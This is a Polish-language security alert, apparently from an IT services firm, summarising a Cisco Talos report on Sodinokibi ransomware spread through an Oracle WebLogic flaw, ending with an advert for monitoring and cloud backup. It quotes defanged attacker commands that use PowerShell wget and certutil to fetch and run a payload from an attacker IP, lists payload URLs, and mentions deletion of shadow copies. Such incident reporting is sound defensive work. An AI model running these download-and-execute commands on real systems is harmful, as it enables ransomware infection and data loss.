facebook adres e-mail telefon

[ALERT] Ransomware „Sodinokibi” wykorzystuje lukę w serwerach bazodanowych

Ransomware - szkodliwe oprogramowanie aktywnie wykorzystują ujawnioną niedawno lukę w zabezpieczeniach serwerów bazodanowych aplikacji, aby zainstalować nowy wariant oprogramowania ransomware o nazwie „Sodinokibi”.

"Sodinokibi" próbuje zaszyfrować dane w katalogu użytkownika i usunąć kopie zapasowe, aby utrudnić odzyskiwanie danych.  Luka ta jest łatwa do wykorzystania przez atakujących, ponieważ każdy, kto ma dostęp HTTP do serwera bazodanowego, może przeprowadzić atak. Atakujący wykorzystują ten exploit od co najmniej 17 kwietnia . Zespół Cisco Incident Response (IR) wraz z Cisco Talos aktywnie weryfikują tego rodzaju ataki. Użytkownik widzi komunikat jak niżej:
[ALERT] Ransomware


Pierwsze etapy ataku ransomware miały miejsce 25 kwietnia, dzień przed opublikowaniem przez Oracle aktualizacji. Była to próba sprawdzenia, czy serwer jest podatny na atak.

[ALERT] Ransomware
 
25 kwietnia 2019 aktywność pokazująca początkową aktywność poprzedzającą wdrożenie oprogramowania ransomware. 

26 kwietnia 2019 r. Atakujący nawiązali połączenie HTTP z innym podatnym serwerem, żądając usługi AsyncResponderService serwera Oracle WebLogic.
 
 
[ALERT] Ransomware
 
Aktywność od 26 kwietnia. Atakujący pobierają ransomware Sodinokibi. 


Historycznie większość odmian oprogramowania ransomware wymagała pewnej formy interakcji z użytkownikiem, takiej jak otwarcie przez użytkownika załącznik do wiadomości e-mail.

W tym przypadku napastnicy wykorzystali lukę w kodzie, inicjując pobranie przez serwer, którego dotyczy problem, kopii oprogramowania ransomware z adresów IP kontrolowanych przez atakującego 188.166.74 [.] 218 i 45.55.211 [.] 79. 


Ataki pochodziły z adresu 130.61.54 [.] 136. Żądanie HTTP POST zawierało argumenty do instrukcji cmd.exe - komendy PowerShell do pobrania pliku o nazwie „radm.exe” z hosta 188.166.74 [.] 218, a następnie plik był zapisywany lokalnie i zaczynał się wykonywać.

cmd / c powershell.exe wget http [:] // 188.166,74 [.] 218 / radm.exe -outfile% TEMP% / radm.exe & cmd.exe / c% TEMP%


Oprócz PowerShell zaobserwowaliśmy również, że atakujący kreatywnie przekazali narzędzie certutil do cmd, aby pobrać plik:

cmd / c cmd.exe / c certutil.exe -urlcache -split -f http [:] // 188.166,74 [.] 218 / radm.exe% TEMP% / radm.exe & cmd.exe / c% TEMP% radm.exe


Oprócz „radm.exe” mogą pojawić się pliki pod inną nazwą:

hxxp [:] // 188.166,74 [.] 218 / office.exe 
hxxp [:] // 188.166.74 [.] 218 / radm.exe 
hxxp [:] // 188.166.74 [.] 218 / bez tytułu. exe 
hxxp [:] // 45.55.211 [.] 79 / .cache / untitled.exe

Poniżej znajduje się schemat złośliwego pliku „untitled.exe” wykorzystujący „cmd.exe” do wykonania narzędzia vssadmin.exe. Ta akcja jest powszechną taktyką oprogramowania ransomware, aby uniemożliwić użytkownikom łatwe odzyskiwanie danych. Próbuje usunąć domyślne mechanizmy tworzenia kopii zapasowych systemu Windows, zwane inaczej „kopiami w tle”, aby zapobiec odzyskiwaniu oryginalnych plików z tych kopii zapasowych.

 [ALERT] Ransomware
 
[ALERT] Ransomware

Źródło: blog.talosintelligence.com

CSK w ramach swoich usług zapewnia proaktywny monitoring usług, w tym działania serwerów. Stale nadzorujemy działanie aplikacji, co pozwala na szybką reakcję w momencie wykrycia niepożądanego działania. Oferujemy swoim klientom usługę MOB czyli backup w chmurze, co pozwala w bezpieczny sposób przywrócić poprawne działanie systemu. Należy jednak pamiętać, że żadne rozwiązanie nie daje 100% pewności bezpieczeństwa danych. W przypadku pytań zapraszamy do kontaktu.

Masz pytania? Napisz do nas!

Wyślij wiadomość